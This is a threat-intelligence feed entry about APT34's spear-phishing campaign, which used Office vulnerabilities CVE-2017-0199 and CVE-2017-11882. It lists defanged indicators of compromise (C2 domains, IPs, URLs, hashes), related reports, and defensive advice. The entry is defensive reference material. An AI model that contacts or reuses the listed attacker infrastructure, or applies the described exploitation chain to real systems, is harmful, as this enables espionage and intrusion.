Threats Feed|APT34|Last Updated 04/02/2026|AuthorCertfa Radar|Publish Date07/12/2017

APT34's Utilization of Microsoft Office Vulnerabilities to Compromise Middle Eastern Organizations

  • Actor Motivations: Espionage,Exfiltration
  • Attack Vectors: Vulnerability Exploitation,Backdoor,Downloader,Dropper,Spear Phishing
  • Attack Complexity: High
  • Threat Risk: High Impact/High Probability

Threat Overview

The Iranian cyber espionage group APT34 exploited two vulnerabilities (CVE-2017-0199 and CVE-2017-11882) in Microsoft Office to deliver malicious payloads against Middle Eastern governmental organizations. The group utilized spear-phishing emails with malicious .rtf files attached, which upon opening, exploited the vulnerabilities and executed malicious scripts. The scripts, POWRUNER and BONDUPDATER, performed actions such as persistence and command-and-control (C2) communication, including use of a domain generation algorithm (DGA) to evade detection.

Reference and Credit: Mandiant - December 2017

New Targeted Attack in the Middle East by APT34, a Suspected Iranian Threat Group, Using CVE-2017-11882 Exploit

Detected Targets

TypeDescriptionConfidence
SectorGovernment Agencies and Services
The report indicates that an unnamed government organization in the Middle East was targeted by the attacker exploiting the Microsoft Office vulnerability CVE-2017-11882.
Verified
RegionMiddle East Countries
Verified

Extracted IOCs

  • anyportals[.]com
  • dns-update[.]club
  • hpserver[.]online
  • mumbai-m[.]site
  • proxychecker[.]pro
  • proxycheker[.]pro
  • 13b338c47c52de3ed0b68e1cb7876ad2
  • 247b2a9fcba6e9ec29ed818948939702
  • 3c63bff9ec0a340e0727e5683466f435
  • 42449dd79ea7d2b5b6482b6f0d493498
  • 4a7290a279e6f2329edd0615178a11ff
  • 52ca9a7424b3cc34099ad218623a0979
  • 635ed85bfcaab7208a8b5c730d3d0a8c
  • 63d66d99e46fb93676a4f475a65566d8
  • 841ce6475f271f86d0b5188e4f8bc6db
  • 9267d057c065ea7448aca1511c6f29c7
  • a0e6933f4e0497269620f44a083b2ed4
  • a3fcb4d23c3153dd42ac124b112f1bae
  • b2d13a336a3eb7bd27612be7d4e334df
  • bbde33f5709cb1452ab941c08acc775e
  • c87b0b711f60132235d7440add0360b0
  • c9f16f0be8c77f0170b9b6ce876ed7fb
  • d85818e82a6e64ca185edfddba2d1b76
  • dbfea6154d4f9d7209c1875b2d5d70d5
  • e516c3a3247af2f2323291a670086a8f
  • e6ac6f18256c4dde5bf06a9191562f82
  • eaf3448808481fb1fdbb675bc5ea24de
  • ee1c482c41738aaa5964730dcbab5dff
  • eeb0ff0d8841c2ebe643fe328b6d9ef5
  • fb464c365b94b03826e67eabe4bf9165
  • 145[.]239.33.100
  • 148[.]251.55.110
  • 185[.]15.247.147
  • 46[.]105.221.247
  • 82[.]102.14.219
  • 94[.]23.172.164
  • hxxp://dns-update[.]club
  • hxxp://mumbai-m[.]site
download

Tip: 38 related IOCs (6 IP, 6 domain, 2 URL, 0 email, 24 file hash) to this threat have been found.

Overlaps

OilRigOilRig's Poison Frog: From PowerShell Backdoors to Cisco AnyConnect Disguises

Source: Kaspersky - December 2019

Detection (one case): c9f16f0be8c77f0170b9b6ce876ed7fb

APT34APT34's Enhanced Cyber Espionage: BONDUPDATER and POWRUNER Malware Variants Unveiled

Source: Booz Allen - February 2018

Detection (six cases): 185[.]15.247.147, 82[.]102.14.219, 94[.]23.172.164, c9f16f0be8c77f0170b9b6ce876ed7fb, proxychecker[.]pro, proxycheker[.]pro

Hint: Overlaps are extracted automatically by examining the IOCs associated with all indexed threats and actors.

FAQs

Understanding the APT34 Campaign

A cyber threat group known as APT34 launched a cyberattack campaign targeting organizations. They sent malicious emails containing corrupt documents that exploited a vulnerability in Microsoft Office (specifically the Equation Editor) to infect computers without user interaction beyond opening the file.

The attack is attributed to APT34, a group that loosely aligns with public reporting on an entity known as "OilRig." They are a capable group known for targeting entities in the Middle East and having access to their own malware development resources.

The primary goal appears to be establishing a "backdoor" into the victim's network. This allows the attackers to remotely control the infected computer, execute commands, upload/download files, and take screenshots of the user's activity.

The report specifically identifies organizations in the Middle East region as the primary targets. Historically, this group has targeted banks and other organizations in this area.

The attackers sent emails with a malicious .rtf (Rich Text Format) attachment. When opened, the file exploited a flaw in Microsoft Office to run a series of scripts. These scripts downloaded malicious software, hid it on the system, and set up a schedule to ensure the malware ran automatically every minute.

The most effective defense is to update Microsoft Office software immediately to patch the CVE-2017-11882 vulnerability. Organizations should also look for specific malicious file names mentioned in the report and monitor for unusual program behaviors, such as the Equation Editor program launching unexpected commands.

About Affiliation
APT34
View APT34's Insights